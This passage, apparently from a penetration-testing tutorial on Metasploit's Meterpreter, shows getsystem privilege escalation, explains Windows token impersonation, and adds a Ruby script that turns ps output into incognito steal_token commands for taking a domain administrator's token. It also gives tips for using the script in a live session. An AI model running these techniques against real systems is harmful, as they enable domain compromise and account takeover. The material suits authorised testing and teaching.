Meterpreter

meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

The number in getsystem's output identifies which of its escalation techniques succeeded (getsystem -h lists them). To switch back to the user account under which we first obtained the Meterpreter shell, we use rev2self, which drops the SYSTEM impersonation and returns the session to the token it started with.

Token Impersonation

In token impersonation, we take an access token that already exists on the target machine and use it in place of authentication to assume the identity of the user for whom that token was created. Windows attaches an access token to every process and thread to record whose security context it runs under; when a user logs on, interactively or over the network, the system creates a token for that logon session, and any process holding a copy of that token can act as that user. (These are Windows access tokens, not Kerberos tickets, although the logon that produced a token may well have been a Kerberos logon.) Token impersonation is very beneficial for penetration tests and can be one of Meterpreter's most powerful features.

Consider the following scenario, for example: You're performing a penetration test at your organization, and you successfully compromise a system and establish a Meterpreter console. A domain administrator account logged on to that system within the last 13 hours, and the logon session is still present. When the account logged on, Windows created an access token for it; that token stays on the machine for as long as the logon session lives (a logoff or reboot removes it), whether or not the administrator is still doing anything. With SYSTEM privileges on the host (which is why getsystem came first), Meterpreter can enumerate and duplicate the tokens held by every process, and through it you assume the role of the domain administrator without ever learning the password. From there you can add an account of your own to the domain administrators or go after a domain controller. Two caveats apply: you can only impersonate tokens that are actually present on this host, and only a delegation token (the kind created by an interactive logon, or by a service or scheduled task running with the user's credentials) can be used to authenticate to other systems such as the domain controller; an impersonation-level token from a network logon works locally but does not carry across the network. This is probably one of the easiest ways to gain access into a system and just another example of why Meterpreter is so useful.

Using ps

For this example, we'll use the Meterpreter function ps to list the running applications and show under which account each one is running. We'll use the domain name SNEAKS.IN and the user account ihazdomainadmin.

meterpreter > ps

Process list
============

 PID   Name                 Arch  Session  User                          Path
 ---   ----                 ----  -------  ----                          ----
 0     [System Process]
 4     System               x86   0        NT AUTHORITY\SYSTEM
 380   cmd.exe              x86   0        SNEAKS.IN\ihazdomainadmin     \SystemRoot\System32\cmd.exe

. . . SNIP . . .

meterpreter >
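The ps listing above is the input for deciding whose token to take. The following Ruby script is an added example, not code from the book or from Metasploit: it parses ps output by the column offsets in its header line (so process names with spaces and empty Path cells survive), drops the built-in service accounts, groups the remaining processes by owner, and prints the incognito commands (use incognito, then steal_token PID) needed to take one token per account. The sample listing is constructed: PID 380, SNEAKS.IN and ihazdomainadmin come from the page, while the svchost.exe, explorer.exe and outlook.exe rows, the host name WIN-TARGET and the user bob are invented, and SERVICE_ACCOUNTS is the script's own exclusion list.

```ruby
# Added example, not from the book: turn Meterpreter "ps" output into a
# shortlist of processes whose primary token incognito's steal_token can take.
# SERVICE_ACCOUNTS (hypothetical exclusion list) and all sample rows other than
# PID 380 are constructed for illustration, not captured from a real target.

SERVICE_ACCOUNTS = [
  "NT AUTHORITY\\SYSTEM",
  "NT AUTHORITY\\LOCAL SERVICE",
  "NT AUTHORITY\\NETWORK SERVICE",
].freeze

COLUMNS = %w[PID Name Arch Session User Path].freeze

# Constructed sample in the layout Meterpreter's ps command prints.
# Three- and four-digit PIDs are flush-left, one column before the "PID"
# label, as in the book's listing.
SAMPLE_PS = <<~'PS'
  Process list
  ============

   PID   Name                 Arch  Session  User                          Path
   ---   ----                 ----  -------  ----                          ----
   0     [System Process]
   4     System               x86   0        NT AUTHORITY\SYSTEM
  380    cmd.exe              x86   0        SNEAKS.IN\ihazdomainadmin     \SystemRoot\System32\cmd.exe
  560    svchost.exe          x86   0        NT AUTHORITY\NETWORK SERVICE  \SystemRoot\System32\svchost.exe
  1204   explorer.exe         x86   1        WIN-TARGET\bob                C:\Windows\explorer.exe
  1600   outlook.exe          x86   1        SNEAKS.IN\ihazdomainadmin     C:\Program Files\Outlook\outlook.exe
PS

# Parse the fixed-width table by the column offsets found in the header line.
# Slicing by offset (rather than splitting on whitespace) keeps names such as
# "[System Process]" intact and tolerates rows with no Path at all.
def parse_ps(text)
  lines = text.lines.map(&:chomp)
  header_idx = lines.index { |l| l.strip.start_with?("PID") && COLUMNS.all? { |c| l.include?(c) } }
  raise ArgumentError, "no ps header line found" unless header_idx

  header = lines[header_idx]
  offsets = COLUMNS.map { |c| header.index(c) }
  offsets[0] = 0 # PID values may start one column before the "PID" label

  lines.drop(header_idx + 1).each_with_object([]) do |line, rows|
    cells = offsets.each_with_index.map do |start, i|
      stop = offsets[i + 1]
      (stop ? line[start...stop] : line[start..]).to_s.strip
    end
    next unless cells[0].match?(/\A\d+\z/) # skips the "---" rule, blank lines and prompts
    rows << COLUMNS.zip(cells).to_h
  end
end

# Group candidate PIDs by account, dropping unowned rows and built-in service
# accounts; optionally keep only one domain's accounts. Any process the account
# owns will do, because steal_token takes that process's primary token.
def steal_targets(rows, domain: nil)
  rows
    .reject { |r| r["User"].empty? || SERVICE_ACCOUNTS.include?(r["User"]) }
    .select { |r| domain.nil? || r["User"].upcase.start_with?("#{domain.upcase}\\") }
    .group_by { |r| r["User"] }
    .transform_values { |rs| rs.map { |r| r["PID"].to_i }.sort }
end

# Commands to paste into the Meterpreter console: load incognito, then steal
# one token per account (the lowest PID). getsystem must already have run,
# otherwise other users' processes are not visible to steal from.
def incognito_commands(targets)
  ["use incognito"] + targets.values.map { |pids| "steal_token #{pids.first}" }
end

if __FILE__ == $PROGRAM_NAME
  rows = parse_ps(SAMPLE_PS)
  targets = steal_targets(rows, domain: "SNEAKS.IN")
  targets.each { |user, pids| puts "#{user}: PIDs #{pids.join(', ')}" }
  puts incognito_commands(targets)
end
```

In a live session, paste the real ps output into SAMPLE_PS (or read it from a file), run getsystem before any steal_token, and, if you intend to authenticate onward to a domain controller, prefer a process in an interactive session (Session 1 or higher) because its token is far more likely to be a delegation token than one from a Session 0 service process.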